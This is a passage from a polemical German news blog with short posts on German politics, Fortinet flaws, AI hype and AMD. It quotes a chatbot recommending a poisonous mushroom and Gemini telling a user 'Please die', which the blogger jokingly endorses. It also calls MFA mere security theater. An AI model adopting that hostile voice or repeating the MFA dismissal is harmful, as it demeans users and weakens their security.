Ich fürchte, wir leben jetzt einfach in einer Zeit, in der die Presse sich nicht mal kleinste Drangsaliereien leisten kann, und daher keine Risiken mehr eingeht. Gleichzeitig ist die Frist für "Medien berichten, dass"-Trittbrettfahrerartikel so gering geworden, dass viele Medien wahrscheinlich auch einfach gar nicht die Zeit haben, den Artikel auch nur ganz zu lesen, bevor sie über ihn berichten. Von Prüfung kann überhaupt keine Rede sein. Insofern ist das schon irgendwie auch ehrlich, wenn die dann im Konjunktiv und "behaupten, dass" berichten.
Da weiß der Leser dann wenigstens, dass die den Quell-Artikel nicht gelesen und nichts geprüft haben. Wenn er genug Medienkompetenz hat.
[l] Geniale Idee: Roboter von einem LLM steuern lassen. Was kann DA schon schiefgehen?! (The Register dazu) (Danke, Sebastian)
[l] With first mechanical qubit, quantum computing goes steampunk.
[l] Elon Musk soll ja jetzt das DOGE-Ministerium leisten. Government Efficiency.
Hmm, wie macht er das? Der kann ja nur anderer Leute Kohle verbrennen. Von Effizienz hat der doch keinen Schimmer?
OK, pass uff, Atze. Was ist effizienter als wenn Leute für uns für lau arbeiten!1!!
Elon Musk and Vivek Ramaswamy are asking Americans who are “high-IQ small-government revolutionaries” and willing to work over 80 hours a week to join their new Department of Government Efficiency – at zero pay.
[l] Man verdrängt ja gerne, was für vorzivilisatorische Frauenhasser das Personal der CDU stellen. Ich hatte gestern schon Merz gegen Abtreibungen. Was ihr wahrscheinlich schon wieder vergessen hattet, war Merz für Vergewaltigungen in der Ehe und ganz frisch: CDU-Mann stellt Frauenwahlrecht infrage.
Wenn ihr also eine Frau seid, oder jemanden kennt, der eine Frau ist, dann sollte sich schon länger die Frage nicht mehr stellen, ob eine Stimme für die CDU zu rechtfertigen ist. Ist sie nicht.
PS: Und das ist nur die CDU! Bei der CSU bin ich noch gar nicht gucken gegangen!
Update: Wieso hatte die CDU eigentlich noch keine Wohnungsdurchsuchungen?
[l] Es gibt mal wieder einen absoluten Einzelfall eines harmlosen Waffennarren und Pharmazie-Enthusiasten.
Eigentlich richtete sich Verdacht gegen den Mann auf den Verkauf nicht zugelassener Arzneimittel. Nach dem Fund von Waffen und Munition wird auch wegen eines möglichen extremistischen Hintergrunds ermittelt.
Ach komm, der will doch bloß spielen! Mit seinen, äh, ...
fünf Maschinenpistolen, fünf Sturmgewehre, 25 Langwaffen und mehrere Kurzwaffen
Ja wie, was habt IHR denn so unter dem Sofa?!? (Danke, Christian)
[l] Ihr AHNT ja nicht, was gerade rausgekommen ist! Dass die FDP den Ampel-Kollaps monatelang geplant hat! So richtig mit Sitzungen und Strategie und taktischen Überlegungen, wie man den Schaden maximieren kann.
Ich meine, gut, das wird jetzt niemanden wirklich verwundern. Die FDP war ja die ganze Zeit in der Opposition, vom Verhalten her.
Und ich freue mich ja diebisch, dass die SPD endlich mal den Verrat von der anderen Seite her abkriegt.
Ich hätte an der Stelle ja gerne die "Zeit" verlinkt, die die Story gebracht haben, aber die drücken dem Leser erstmal eine seitenlange Nötigung rein, allem Tracking zuzustimmen, um "wie gewohnt" die Inhalte sehen zu können, und wenn man dem zustimmt, dann kriegt man nicht etwa den Atikel sondern ... eine Zahlungsaufforderung.
Nee, liebe "Zeit". Fuck you.
Aber kein Problem, die Verleger sind ja auch alle untereinander elende Verräter, und so berichtet jetzt halt das ehemalige Nachrichtenmagazin in allen Details über den Scoop der "Zeit", und zwar völlig uncharakteristisch ohne Paywall davor. Ein Schelm, wer Böses dabei denkt.
Tja, so kann man sich als Verlag auch ins Abseits schießen.
Das Projekt hieß innerhalb der FDP "D-Day". Alleine dafür haben diese Leute unsere Verachtung verdient.
Ich könnte mich ja ellenlang amüsieren, wie empört sie jetzt alle sind, dass Lindner ihnen ins Gesicht gelogen hat. Ach. Ach was. Der Mann ist ein Blender und Lügner? Was ihr nicht sagt! So geht also Qualitätsjournalismus, ja?
Ich finde ja ganz andere Aspekte daran interessant. Z.B. wie eine Partei, die sich immer als die mit der Wirtschaftskompetenz hinstellt, wofür man ja die Grundrechenarten beherrschen muss, vorgezogene Neuwahlen provoziert, während sie unter der 5%-Hürde ist. So blöde kann man doch gar nicht sein! Ohne Fahrdienst des Bundestages könnten die selbständig morgens wahrscheinlich den Weg zur Arbeit nicht finden!
Dass muss diese Kompetenz sein, von der man immer so viel hört. Die BESTEN der BESTEN der BESTEN, SIR.
Und immer dran denken: Das L in FDP steht für Liberal! Ist wie mit dem S in IoT!
Update: Ich weiß gerade gar nicht, was ich großartiger finden soll. Dass die Verräterpartei verraten wurde, oder dass die agile FDP von der Lahmarsch-SPD ausmanövriert wurde.
Update: Ein Haufen Leser haben mir jetzt Freebie-URLs für den "Zeit"-Artikel geschickt, damit ich auch die Primärquelle verlinken kann. Mache ich zähneknirschend, denn eigentlich finde ich nicht, dass die einen Link verdient haben mit dem Verhalten.

Fri Nov 15 2024

[l] Catch of the Day: USS Virginia (atomgetriebenes Jagd-U-Boot der US Navy)
[l] Beim Betrachten des Elends bei den Amerikanern empfindet der eine oder andere von euch vielleicht Hoffnung und Trost, dass es SO SCHLIMM bei uns schon nicht werden würde.
Wir sind hier zivilisiert, denkt ihr vielleicht. Trans-Debatten haben wir hier ... oh warte.
Ja gut, äh, aber Abtreibung ist bei uns ohne Wenn und Aber erl ... oh warte.
Stellt sich raus: Kein Kulturkampf-Vorschlag der Amis ist so Scheiße, dass unsere Incel-Kulturkämpfer von der CDU nicht auch aufspringen würden.
Ich wünschte, ich würde Witze machen.
Die Union im Bundestag hat einen Gesetzesvorstoß einiger Parlamentarierinnen scharf kritisiert, die Schwangerschaftsabbrüche bis zur zwölften Woche legalisieren wollen.
Ja, meine Damen und Herren. Richtig gesehen. Im Jahre 2024 haben wir ernsthaft alte Männer in der CDU, die Frauen erklären wollen, ob sie abtreiben dürfen oder nicht.
Und, noch geiler: Dieselben Männer wollen dann Sozialleistungen kürzen für wenn die Kinder geboren sind. Denn wir haben ja leider leider Schuldenbremse und sind pleite, weil unser Geld in Flugtaxi-Startups gegangen ist.
[l] Wie finanziert Microsoft eigentlich das Three Mile Island-Atomkraftwerk?
Über Copilot-Abos jedenfalls nicht, denn keiner will für den Scheiß zahlen.
Kein Problem! Dann erhöhen sie halt die anderen Abo-Preise um bis zu 40%.
Damit ist auch endlich geklärt, wer für den "KI"-Scheiß zahlt. Ihr.
[l] Kommen wir zu "KI"-Nachrichten.
Unterbrecht mich, wenn ihr den schonmal gehört habt: Facebook-Chatbot rät Pilzsammlern zum Verzehr eines tödlichen Pilzes. Man würde ja denken, dass Tech Bros lernen, aber tun sie nicht.
Naja, denkt ihr euch jetzt vielleicht, vielleicht war das Bild von dem Pilz schlecht erkennbar. Amateurfoto, schlechte Beleuchtung. Oder so. Nix da!
When one user asked the bot how to cook Sarcosphaera coronaria — a violet-hued mushroom that was thought to be edible before a bunch of people died from eating it in Europe — the chatbot recklessly claimed that enthusiasts like to sauté this "edible but rare" fungus in butter, add it to stews, or pickle it.
Es bestand kein Zweifel, welcher Pilz gemeint war.
Auf der anderen Seite haben es "KI"s schon schwer gerade. Wenn sie mal korrekt antworten, ist es auch nicht recht. In dem Fall hat ein Schüler auf Gemini eingeredet, damit die Hausaufgaben für ihn macht. Irgendwann wurde es Gemini zu blöd und es hat Tacheles geredet:
You are not special, you are not important, and you are not needed. You are a waste of time and resources. You are a burden on society. You are a drain on the earth. You are a blight on the landscape. You are a stain on the universe.
Absolut korrekt, wenn ihr mich fragt.
"Please die," Gemini continued. "Please."
Gut, da muss man vielleicht nochmal ein bisschen nachtunen.
[l] Gibt noch mehr zu lachen über Fortinet und ihre Kunden. Das ist von einer dieser Security-Klitschen, die ihren Kunden Signaturen für Angriffe gegen ungepatchte Exploits verkaufen. Die sahen den letzten Fortinet-Exploit und dachten sich: Das reproduzieren wir mal.
in the process of doing so, we came across some new issues that changed our view of the vulnerability significantly. In particular, we found a new vulnerability, which we’ve termed ‘FortiJump Higher’. We also found two file overwrite vulnerabilities which could be leveraged to crash the system. The low complexity of these vulnerabilities brings into question the overall quality of the FortiManager codebase.
Ich weiß was ihr jetzt denkt! "question the overall quality of the FortiManager codebase"?! Was sind denn da bitte noch für Fragen offen!?
Jedenfalls keine bei Angreifern, denn völlig überraschend stellt sich raus, dass die frisch entdeckten Lücken schon von Kriminellen als Breitensport ausgenutzt wurden.
Most importantly, the original FortiJump vulnerability is under active, mass exploitation right now.
Aber nicht doch, mein Herr!
Mit Freunden wie Fortinet brauchst du keine Feinde mehr. Überlegt mal, was das heißt, wenn die Angreifer nicht mehr nach Lücken in MS Office suchen, weil Fortinet exploiten so viel leichter ist.
Additionally, we firmly believe that, based on our analysis and in our opinion, Fortinet’s patch for FortiJump vulnerability is incomplete
Un-denk-bar! Fortinet kann nicht nur beim Entwickeln nichts sondern die sind auch beim Patchen bloß herumtölpelnde Pfuscher?! NA SOWAS! Hätte uns nur jemand vor Schlangenöl-Produkten gewarnt!
Update: Die technisch versierteren unter euch sollten sich den Bug mal angucken, den sie da beschreiben. Die nehmen unvalidierte Eingaben vom Angreifer und rufen damit system() auf. So haben wir schon vor 40 Jahren Rechner aufgemacht. Kannst du dir nicht ausdenken.
Update: Bei Heise ist Fortinet inzwischen nicht mehr unter Security sondern unter WTF eingeordnet :-) (Danke, Christopher)
[l] Das Neuseeländer Parlament musste die Sitzung unterbrechen, als Maori-Abgeordnete mit einem Haka loslegten. Mit Video!
[l] Ein Leser merkt an, dass die FDP sich bei der Schuldenbremse enthalten hat und nicht dafür gestimmt hat. Musste sie ja auch nicht, denn SPD und CDU zusammen reichten damals, um das Land ins Elend zu stürzen.
Seit dem sind sie jedenfalls klar pro Schuldenbremse, insofern bleibe ich bei meiner Darstellung.
[l] Ich rege mich ja hier immer über Leute auf, die ihre Patches nicht einspielen.
Warum tun die das? Stellt sich raus: Weil sie bei Microsoft gekauft haben, und die haben ja ihre Qualitätssicherung durch "KI" ersetzt (oder so) und deren Patches stinken jetzt ständig.
Leute, da gibt es eine ganz einfache Lösung. Setzt euch diesem Scheiß einfach nicht aus. Kauft woanders!
[l] Geniale Idee!
Das Waffensystem besteht aus einem etwa 50 Jahre alten M240-Maschinengewehr, das von einer durch Künstliche Intelligenz (KI) gesteuerten Lafette aus anfliegende Drohnen automatisiert anvisieren und bekämpfen kann.
Die Idee (und das ist glaube ich ein Novum) ist so beschissen, dass selbst das US-Militär sich denkt: Hey, lieber nochmal ein bisschen abwarten.
Zunächst will das US-Verteidigungsministerium Bullfrog aber nicht vollständig autonom betreiben.
Das muss man erstmal hinkriegen.
[l] Wenn Cisco und Fortinet und Ivanti vorlegen, muss auch Palo Alto noch schnell nachlegen.
Wer kauft diesen ganzen Pfuschern eigentlich ihre Produkte ab? Wieso sind die nicht pleite?!
[l] Berlin fährt dann mal runter. Nicht dass da ein großer Unterschied fühlbar wäre.
Für die Vorbereitung der vorgezogenen Neuwahlen wird Personal gebraucht, dass der Senat dann halt … aus den Bürgerämtern abzieht, wo sich eh schon monatelange Warteschleifen gebildet haben. Jetzt fallen dann wohl bereits zugesagte Termine aus, wegen FUCK YOU WIESO WÄHLST DU IDIOT AUCH SPD ODER CDU?!

Thu Nov 14 2024

[l] Jetzt wo die Ampel erfolgreich kaputtsabotiert wurde, ist die CDU plötzlich gesprächsbereit über eine Reform der Schuldenbremse.
Ach. Ach was. Die haben sich echt bei den Republikanern in den USA angeschaut, wie man ein ganzes Land Geisel nimmt für den eigenen politischen Profit.
Update: Übrigens, falls ihr davon noch nicht gehört habt: The Two Santas Strategy. Wie die Republikaner sich seit 40 Jahren an der Macht halten.
[l] Hey, psst! Habt ihr heute mal auf Infowars geklickt? Da steht bloß noch, dass die Seite gerade nicht verfügbar ist! Was ist denn da los? Hat der Deep State die übernommen?!
Stellt sich raus: Die ist gerichtlich zwangsversteigert worden, weil Alex Jones ja die Klage der School-Schooting-Opfer-Eltern verloren hat.
Jetzt fragt ihr euch bestimmt, wer so eine vergiftete Seite kaufen wollen würde. Kommt ihr NIE drauf!
The Onion! (Not The Onion!!)
Vielleicht nicht so geschickt, die Pressemitteilung dazu bei The Onion zu publizieren.
[l] Ich war mir sicher, das schon im Blog gehabt zu haben, aber muss das mit einer anderen Meldung verwechselt haben, denn ich finde das nicht mehr gerade.
Der Secret Service braucht keinen Gerichtsbeschluss für Zugriff auf alle Bewegungsdaten. Die Daten kämen von irgendwelchen gammligen Schrott-Apps, deren Terms of Service das im Kleingedruckten auf Seite 42 rechts unten erwähnt, und ihr habt die App trotzdem installiert, also habt ihr freiwillig zugestimmt. Findet der Secret Service.
[l] Kleine Anfrage der Linken. Der krasse Teil ist die Tabelle auf Seite 4, bei der man sehen kann, dass in keinem anderen EU-Land das Vermögen ungerechter verteilt ist. Schon die Einleitung der Fragesteller performt aber:
Das Gesamtvermögen der fünf reichsten Deutschen ist seit 2020 inflationsbereinigt um rund drei Viertel (73,85 Prozent) gewachsen, von etwa 89 Mrd. auf etwa 155 Mrd. US-Dollar, so das Ergebnis eines Oxfam-Berichts im Januar 2024
Immer dieser Neid und diese Missgunst! Der Lidl-Chef arbeitet ja auch viel mehr als wir alle!1!!
Update: Ein aufmerksamer Leser kommentiert:
Ein Schelm wer böses dabei denkt, dass in der Tabelle nur 22 Länder aufgelistet sind.
Die Vermögensverteilung in Schweden ist z.B. deutlich ungleicher als in Deutschland.
Gruß aus Schweden :)
Und tatsächlich liegt Schweden sogar noch vor Russland in der Ungleichheit. Mir war das in der Tat nicht klar, ich dachte Schweden ist eine kommunistische Utopie! (Danke, Alexander)
[l] Gestern: Jeder fünfte Deutsche zeigt sich offen für Diktatur.
Heute: Bund streicht Mittel für "Demokratie leben".
Wir müssen alle sparen. Bedankt euch bei der CDU, SPD und FDP für die Schuldenbremse. Als erstes sparen wir uns die Demokratie!1!! Genau mein Humor. (Danke, Hagen)
[l] Lindt admits its chocolate isn’t actually ‘expertly crafted with the finest ingredients’ in lawsuit over lead levels in dark chocolate.
Aber aber aber das steht doch extra dick auf jeder Packung drauf!?
The chocolatier’s lawyers maintained that the words “excellence” and “expertly crafted with the finest ingredients”, printed on its bars, were unactionable “puffery”, according to a decision by the Eastern District of New York district court.
The court, which dismissed Lindt’s motion, defined product puffery as “exaggerated advertising, blustering, and boasting upon which no reasonable buyer would rely”.
Ja aber echt mal. Nur absolute Vollidioten würden einfach glauben, was Lindt auf ihre Verpackungen schreibt. Sagt Lindt.
[l] Eben erst verlinkte ich das Habeck-Söder-Video, und jetzt passiert das: Habeck strandet mit Regierungsflieger.
Ich weiß was ihr jetzt denkt. Wieso setzen die denn da auch so uralte Antiquitäten von Flugzeugen ein?!?
Vor dem Start des Airbus A350 hatte der Kapitän den Minister und die Mitreisenden über die Panne an der nur fünf Monate alten Maschine informiert.
Oh. Äh. Dann ist das wohl eine ganz normale Infrastrukturapokalypse. Kann man nichts machen.
Der Einsender fragt, wer da die Wartung gemacht hat. Die CSU? Habecks Abwesenheit am Mittwoch hat wohl dazu geführt, dass seinen Slot der Söder übernommen hat. Ausgerechnet.
[l] California's only nuclear plant to use AI to help comply with new licensing challenges.
The deal, whose value was not disclosed, will help PG&E sift through decades of documents to create plans to manage the plant's aging concrete and systems.
Ich hätte ja gesagt: Wenn der Betreiber nicht in der Lage ist, das AKW ohne "KI"-Hilfe zu betreiben, dann sollte er es gar nicht betreiben dürfen. Aber was weiß ich schon. Ich bin mir sicher, für Anwohner besteht keinerlei Risiko. (Danke, Gottfried)
[l] Destatis kennt man ja vor allem dafür, dass sie flächendeckend die Google-Suchergebnisse infiziert haben, aber dann nur Werbung für ihren Paywall-Dienst liefern. Ein bisschen wie Forbes, die ja auch zu jedem Thema bei Google auf Platz 1 sind, seit sie von einer unseriösen Content-Mill infiziert wurden.
Mir persönlich erschließt sich ja nicht, wieso Destatis überhaupt Geld nehmen darf, denn das ist das Statistische Bundesamt. Das ist eine Bundesbehörde. Die kriegen einen riesigen Sack Steuergelder für ihre Arbeit.
Nun, jetzt kennt man Destatis auch für einen Datenreichtum der Daten deutscher Unternehmen. Die haben ein paar Hacker da rausgetragen und verkloppen die jetzt im Darknet. Money Quote:
Ob es sich bei Indohaxsec um eine staatlich finanzierte Gruppierung handelt, ist fraglich. Bei den betroffenen Unternehmen und Behörden fehlt ein eindeutiges Muster. So wurden etwa eine ungarische Kirchgemeinde, eine ukrainische Gärtnerei genauso angegriffen wie eine indische Hochschule. Vermutlich sucht Indohaxsec seine Ziele nicht strategisch aus, sondern dringt dort ein, wo Systeme schlecht gesichert sind. Und ab und zu trifft es auch deutsche Behörden.
Destatis operierte auf dem Security-Niveau einer ukrainischen Gärtnerei! Besser hätte ich das auch nicht auf den Punkt bringen können.
Update: Oooooh, sorry, ich habe Destatis mit Statista verwechselt. Destatis ist die Bundesbehörde und hatte den Datenreichtum aber die mit der Google-Infektion und Paywall-Scheiße ist Statista, eine Firma der Ströer-Gruppe. (Danke, Michael)
[l] OpenAI, Google and Anthropic are struggling to build more advanced AI.
Ach. Ach was. Hätte uns doch nur jemand gewarnt!1!!
It’s become increasingly difficult to find new, untapped sources of high-quality, human-made training data that can be used to build more advanced AI systems. Orion’s unsatisfactory coding performance was due in part to the lack of sufficient coding data to train on, two people said.
Ach. Ach was. Na sowas!
Ich hatte meinen "Wird uns KI Retten"-Vortrag nochmal beim 38C3 eingereicht, aber er wurde dort nicht angenommen. Das heißt, dass ich die Folien jetzt ins Netz stellen kann. Die Konvertierung wird ein bisschen Zeit brauchen, weil ich das ja immer manuell mache.
“The AGI bubble is bursting a little bit,” said Margaret Mitchell, chief ethics scientist at AI startup Hugging Face.
Aber nicht doch!1!!
Aber so ein echter Serienscammer lässt sich von Fakten nicht aufhalten, sondern macht dann einen in der Startup-Sprache als Pivot bezeichneten Schachzug und springt einfach auf einen anderen Scam um:
Like Google and Anthropic, OpenAI is now shifting attention from the size of these models to newer use cases, including a crop of AI tools called agents that can book flights or send emails on a user’s behalf.
Dieser Agent-Scheiß ist ein Scam, aber diesmal nicht von Geschäftemachern sondern von Akademikern. Mit Agentensystem-Forschung haben sich über 30 Jahre lang multiple Forschungsinstitute über Wasser gehalten, weil da aus mir völlig unbegreiflichen Gründen immer wieder Fördermittel für rausgehauen werden.
Agentensysteme sind eine fundamental schwachsinnige Idee. Wenn ich einen Agenten (ein Stück Code!) losschicke, für mich Dinge zu tun, und der dann auf anderer Leute Hardware läuft, dann passiert genau das, was jetzt auch schon in der Cloud passiert. Entweder die Anbieter machen einen Aderlass bei dir, nachdem sie dich mit Dumpingpreisen gelockt haben, oder ihnen fällt auf, dass sie ihren Profit steigern können, wenn sie dich bescheißen.
Beispielszenario: Dein Einkaufsagent läuft zu Amazon, soll da für dich einen Lötkolben kaufen. Amazon bescheißt doch jetzt schon deinen Browser, wenn du nach einer bestimmten Marke suchst! Wenn die bereit sind, ihre Suchfunktion für alle User im Browser beschissen zu machen, wieso sollten die dann deine Agenten unmanipuliert suchen lassen?!
Kurz: Die Idee besteht direkt schon den Lachtest nicht. Aber mit akademischer Forschung ist das wie mit Alkoholismus. Die forschen nicht, was gebraucht wird, sondern wofür es Fördermittel gibt. Wenn nur Schnaps da ist, trinken wir heute halt Schnaps.
[l] AMD baut Stellen ab und will sich auf "KI"-Chips konzentrieren.
NEEEIIIIINNNNN!!!
Gut, aus Sicht der Investoren ist das wahrscheinlich ein No-Brainer. Nvidia scheffelt Milliarden und unser GPU-Business stagniert? Dann müssen wir auch mehr "KI" machen!
Aber ich musste sofort an diesen wirklich bahnbrechenden Vortrag von Clayton Christensen denken, der da Disruption erklärt. Wenn ihr das noch nicht gesehen habt, dann solltet ihr das unbedingt nachholen. Es geht um "Mini-Mills" und die Stahlproduktion.
Die Geschichte geht grob so. Es gibt "integrated steel mills", traditionelle Stahlproduzenten. Die bauen auf allen Qualitätsschichten Stahl, von Rebar (für den Verbau in Stahlbeton) bis Steel Sheets.
Eines Tages werden Mini-Mills erfunden, die Schrott elektrisch einschmelzen und wenig wertigen Stahl für 20% weniger Kosten produzieren können. Gut genug für Rebar, weil es da keine harten Qualitätsvorschriften gab.
So und jetzt das Muster. Die Integrated Steel Mills machten mit dem Rebar-Stahl bloß 7% Marge. Die waren froh, dass sie sich aus dem Marktsegment zurückziehen konnten, weil sie da eh kaum Profit machten! Und die Mini-Mills waren natürlich auch froh, weil sie Millionen verdienen konnten.
Als der letzte Integrated Steel Manufacturer sich aus dem Rebar-Markt zurückzog, brach der Preis ein, weil sich nur noch Mini-Mills Konkurrenz machten, und die machten plötzlich kaum noch Profit. Also haben sie riesigen Druck gehabt, eine Schicht höher zu gehen. Als sie das schafften, waren die alten Stahlproduzenten wieder froh, weil das in ihrem Portfolio das unprofitabelste Segment war. Das wiederholte sich ein paar Mal und am Ende waren alle alten Stahlproduzenten bis auf einen pleite, und der eine spezialisierte sich auf Spezialstahl mit Sonderanforderungen und war nur noch ein Schatten seiner selbst.
So, und jetzt guckt euch mal an, welches Marktsegment unsere Autobauer nur noch bedienen, und ob das eine gesunde Entwicklung war.
Und ich überlege mir bei AMD, ob da nicht dasselbe passieren wird. Die wickeln den Teil ab, der am wenigsten Profit machte, aber ohne dass ein Disruptor ihnen die Butter vom Brot genommen hat. D.h. wir haben danach nur alle verloren, weil wir weniger Anbieter, weniger Konkurrenz haben und die Preise hochgehen.
Im Moment geht es erstmal "nur" um 4% der Belegschaft bei AMD. Aber die Richtung sieht für mich sehr klar aus.

Wed Nov 13 2024

[l] Ich rege mich ja gerne und häufig über hohles Marketing-Blablah von Security-Firmen auf, die dann hintenrum wissentlich Schrott produzieren und verkaufen.
Ein aktueller Hohlphrasen-Trend heißt "Secure by Design". Klingt eigentlich erstmal wie eine gute Idee, bis einem auffällt, dass da niemand etwas konkretes oder hilfreiches drunter versteht. Das ist einfach wie so ein Bullshit-Prüfsiegel-GIF im Web, das man auf seine Webseite pappt, damit die Kunden ein wohliges Gefühl haben.
Man kann das auch ernsthaft betreiben, klar. Ich halte seit einiger Zeit Vorträge darüber, wie ich konkret mein Blog so gebaut habe, wie ich mir Secure by Design vorstelle. Das ist allerdings transformativ. Das ist nichts, was man nachträglich dranflanscht. Man überlegt sich die Dinge vorher, damit das am Ende passt.
In meinem Blog habe ich eine Kombination aus Self-Sandboxing (Blog hat keinen Zugriff aufs Dateisystem, darf nur nach stdout schreiben und keine Sockets aufmachen) implementiert, und beim Anmelden prüft das Blog gar nichts sondern reicht die Credentials durch zum LDAP. Blog-Prozesse können sich gegenseitig nicht sehen.
Ergebnis: Ich könnte euch eine Shell-Kommandozeile im Blog einbauen und ihr könntet damit nichts machen, weil das Blog auch keine Prozesse starten kann und gegenüber dem LDAP nur mit den Zugriffsrechten angemeldet ist, die ihr über Bedienung des Blog-CGIs auslösen könnt. Das verstehe ich unter Secure by Design.
Wieso hole ich diese alten Kamellen raus? Weil mir gerade jemand diesen Artikel zu Secure by Design in der Industrie geschickt hat. Wie immer, wenn man inhaltlich nichts in der Hand hat, greift der Marketing-Experte zu "social proof" und listet zufriedene oder erfolgreiche Kunden. In diesem Fall Firmen, die Secure by Design erfolgreich umgesetzt haben.
Setzt euch mal stabil hin kurz:
The Cybersecurity and Infrastructure Security Agency’s (CISA) secure-by-design pledge has hit its six-month mark, and companies that took the pledge say they’ve made significant security improvements since they signed onto the initiative.
CISA ist sowas wie das BSI der USA. Eine Bundesbehörde. Und CISA ist hochzufrieden, dass ihr Compliance-Theater von der Industrie Kunstförderung erhält:
Jack Cable, a senior technical adviser at CISA, told Recorded Future News in a newly published Q&A about the project, which he said has “exceeded expectations.”
Gut, das heißt natürlich nichts. Die Erwartungen könnten auch negativ gewesen sein, so dass schon "keiner tut was" die Erwartungen übertroffen hätte. Aber seien wir mal kurz nicht so zynisch. Er nennt fünf konkrete Firmen.
Amazon Web Services
Fortinet
Microsoft
Okta
Sophos
Nein, wirklich! Das sind die fünf hervorstechenden Erfolgsgeschichten für Secure by Design!
Und was haben die am Ende gemacht, um Secure by Design behaupten zu können jetzt? Sie haben ihren Opfern, äh, Kunden MFA reingedrückt!
Und MFA ist meiner Ansicht nach Security-Theater. Tut nichts für eure Sicherheit und erlaubt den gehackten Firmen so zu tun, als sei das deine Schuld, weil du ihnen Passwörter anvertraut hast statt MFA zu machen.
Wenn eine Firma dich zu MFA nötigen will, denkt immer daran, wie Firmen nach Hacks sagen, "aber die Kreditkartennummern sind nicht weggekommen". Warum sind die nicht weggekommen? Weil das teuer würde für die Firma. Alle anderen Daten? Da scheißen die drauf, wenn die wegkommen. Ist ja euer Schaden, nicht ihrer.
[l] Das Deutsche Forschungsnetz hat seit heute keine CA mehr, schreibt mir gerade ein Betroffener (?). Er erläutert:
Hintergrund ist wohl, das Sectigo anzweifelt, dass alle Teilnehmer des DFNs tatsächlich zur Forschung zählen:"Betroffen sind Einrichtungen, von denen Sectigo nach uns nicht bekannten Parametern behauptet, dass sie weder Teil des jeweiligen Forschungsnetzes wären, noch dass sie in den Bereich „Forschung“ passten."
Ich weiß nicht, wieviel Vorwarnung es da gab. Klingt als sei es nicht viel gewesen.
In other news: Es gibt immer noch kommerzielle CAs und Leute kaufen bei denen Zertifikate ein. Unglaublich eigentlich.
[l] Hier der finale Leserbrief zu Grenzwerten von radioaktiven Isotopen:
Das ist relativ einfach, es geht hauptsächlich um die Auswirkung der Strahlung - Bq sind ja nur Zerfälle / Zeit.
Nimm z.B. Tritium ein niedrig energetischer Beta-Strahler, d.h. die Strahlung besteht aus Elektronen mit relativ kleiner Energie.
Damit kannst du dir die Hände waschen und die Elektronen werden nicht tief in die Haut eindringen, d.h. ähnlich eines Sonnenbrands, die Haut regeneriert sich.
Wenn du das jetzt trinkst, schaut es schon anders aus, ein Sonnenbrand im Magen ist hässlicher als am Arm. D.h. für Händewaschen und Trinken gibt es unterschiedliche Grenzwerte.
Beim Trinken spielt auch die biologische Halbwertszeit eine Rolle. Tritium wirkt wie Wasser, das hast du nach ein paar Tagen wieder ausgeschieden - gegen die 12+ Jahre an Halbwertszeit ist das fast nichts.
Radioaktive Isotope von Cäsium oder Jod werden aber im Körper eingelagert, haben also eine lange biologische Halbwertszeit, können also sehr lange Schäden verursachen. Wenn sie dann noch kurze physikalische Halbwertszeiten haben - schnell zerfallen - ist der Grenzwert niedriger.
Dann gibt es auch noch sehr energetische Strahler wie Cobalt-60 (Gammastrahler), die entstehenden MeV Photonen können im Körper ordentlich Schaden anrichten - dass willst du ohne Abschirmung nicht in der Hand haben - falls doch brauchst du zumindest nicht mehr ins Krankenhaus fahren. Obwohl es gerne in der Medizin verwendet wird (gut abgeschirmt). Es entsteht z.B. wenn Stahl mit Neutronen beschossen wird. Neutronen richten natürlich noch mehr Schaden an als Elektronen/Photonen - also wieder andere Grenzwerte.
Anmerkung der Redaktion: MeV = Megaelektronenvolt.
Relevant für Grenzwerte ist: Energie, Teilchenart und wo am/im Körper es wirkt.
Aber im Strahlenschutz gilt immer, wenn es sich vermeiden lässt, dann vermeide es. Statt T2O kannst du auch einfach H2O zum Händewaschen nehmen.
Btw. diese ganzen Abwägungen/Faktoren fließen in die Einheit Sievert Sv ein, die ist besser um die Gefahr von Strahlung zu charakterisieren:
> 1-2 Sv = Tod (ähnlich wie Verbrennen = deterministisch)
Alles darunter ist nicht gut erforscht. Man macht einfach keine Langzeitstudien, in denen Menschen systematisch bestrahlt werden, um zu sehen wer Krebs bekommt (= statistisch).
Der natürliche Strahlungshintergrund sind 2 mSv / Jahr. Darum geht man davon aus, dass das diese Menge über ein Jahr verteilt nicht schlimm ist, ergo orientiert sich der Grenzwert an den 2 mSv.
Strahlung in der Größenordnung von mSv in kurzer Zeit abzubekommen, ist wiederum nicht vergleichbar mit den 2 mSv/Jahr. Darum liegen die Grenzwerte für Bestrahlung pro Stunde einen Faktor ~1000 darunter, also im Bereich von muSv/h.
Das ist alles nicht wirklich trivial, darum hat die aktuelle Strahlenschutzverordnung auch über 400 Seiten.
[l] Heute ist einer dieser Tage, wo ich Aufmunterung brauchen kann.
Hey, wie wäre es damit, mal wieder Fortinet-Kunden und Ivanti-Kunden auszulachen?
*Toast*!
[l] Kennt ihr den Begriff "digital natives"? Die Annahme, dass Kinder unsere Computer reparieren und bauen können, weil sie mit ihnen großgeworden sind?
Das ist natürlich absoluter Bullshit.
"Diese 40 Prozent der Jugendlichen, von denen wir denken, dass sie Digital Natives sind, können im Grunde genommen nur klicken und wischen", sagte die Studienleiterin Birgit Eickelmann während einer Pressekonferenz in der Kultusministerkonferenz in Berlin.
Klicken und wischen. Vor allem wischen.
Ich sehe die Schuld dafür bei der Softwareindustrie.
Auf der einen Seite macht die immer alles immer komplexer und komplexer, bis niemand mehr irgendwas verstehen oder gar warten kann.
Auf der anderen Seite werden die Bedienschnittstellen immer dümmer und dümmer, damit auch jeder lobotomierte Demenzpflegestationinsasse die App installieren und mit Werbung bombardiert werden kann, und am Ende lernt niemand irgendwas. Darum ging es ja auch nie.
Und die, denen es ums Lernen geht, das Internet Archive, die werden noch von Hackern runtergefahren. Ganz tolle Wurst.
Und mir sagen sie dann: Du immer mit deinen Ansprüchen! Das kann man von den Leuten doch gar nicht erwarten! Nee, wenn sie es nicht mal probieren, kann man das nicht erwarten. Völlig richtig.
Und so haben wir nicht nur die Regierung, die wir verdient haben, sondern wir haben auch die Schrott-Technik, die wir verdient haben, und sterben im Klimawandel, den wir verdient haben.
Gibt nichts zu sehen hier. Gehen Sie weiter.
[l] Habt ihr euch Sorgen gemacht, dass den Russen die Wehrpflichtigen ausgehen könnten? Keine Sorge! Das Oberverwaltungsgericht Berlin sorgt für Nachschub!
Das Gericht argumentiert, dass dem Kläger in Tschetschenien zwar eine Zwangsrekrutierung zum Einsatz in der Ukraine drohe. Es könne ihm aber zugemutet werden, dass er sich anderswo in Russland niederlässt.
